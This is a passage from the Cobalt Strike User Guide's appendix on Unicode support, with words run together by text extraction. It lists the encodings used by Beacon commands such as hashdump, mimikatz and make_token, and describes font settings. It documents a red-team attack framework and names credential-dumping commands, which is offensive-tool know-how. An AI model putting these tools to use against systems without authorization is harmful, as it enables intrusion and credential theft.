Appendix/UnicodeSupport Ingeneral,thetranslationoftexttoandfromthetarget'sencodingistransparenttoyou.Ifyou workonatarget,configuredtoonelanguage,thingswillworkasyouexpect. Differentbehaviors,betweencommands,willshowupwhenyouworkwithmixedlanguage environments.Forexample,ifoutputcontainscharactersfromCyrillic,Chinese,andLatin alphabets,somecommandswillgetitright.Otherswon't. MostcommandsinBeaconusethetarget'sANSIencodingtoencodeinputanddecodeoutput. Thetarget'sconfiguredANSIencodingmayonlymapcharacterstocode-pointsforahandfulof writingsystems.IftheANSIencodingofthecurrenttargetdoesnotmapCyrilliccharacters, make_tokenwillnotdotherightthingwithausernameorpasswordthatusesCyrillic characters. Somecommand,inBeacon,useUTF-8forinputandoutput.Thesecommandswill,generally, dowhatyouexpectwithmixedlanguagecontent.ThisisbecauseUTF-8textcanmap characterstoanyUnicodecodepoint. ThefollowingtabledocumentswhichBeaconcommandsusesomethingotherthantheANSI encodingtodecodeinputandoutput: Command Input Encoding Output Encoding hashdump UTF-8 mimikatz UTF-8 UTF-8 powerpick UTF-8 UTF-8 powershell UTF-16 OEM psinject UTF-8 UTF-8 shell ANSI OEM NOTE: Forthosethatknowmimikatzwell,you'llnotethatmimikatzusesUnicodeWin32APIs internallyandUTF-16characters.WheredoesUTF-8comefrom?CobaltStrike'sinterface tomimikatzsendsinputasUTF-8andconvertsoutputtoUTF-8. SSH Sessions CobaltStrike'sSSHsessionsuseUTF-8encodingforinputandoutput. Logging CobaltStrike'slogsareUTF-8encodedtext. CobaltStrikeUserGuide www.fortra.com page:475
Appendix/UnicodeSupport Fonts Yourfontmayhavelimitationsdisplayingcharactersfromsomewritingsystems.Tochange theCobaltStrikefonts: GotoCobalt Strike -> Preferences -> Cobalt StriketochangetheGUIFontvalue.Thiswill changethefontCobaltStrikeusesinitsdialogs,tables,andtherestoftheinterface. GotoCobalt Strike -> Preferences -> ConsoletochangetheFontusedbyCobaltStrike's consoles. Cobalt Strike -> Preferences -> GraphhasaFontoptiontochangethefontusedbyCobalt Strike'spivotgraph. CobaltStrikeUserGuide www.fortra.com page:476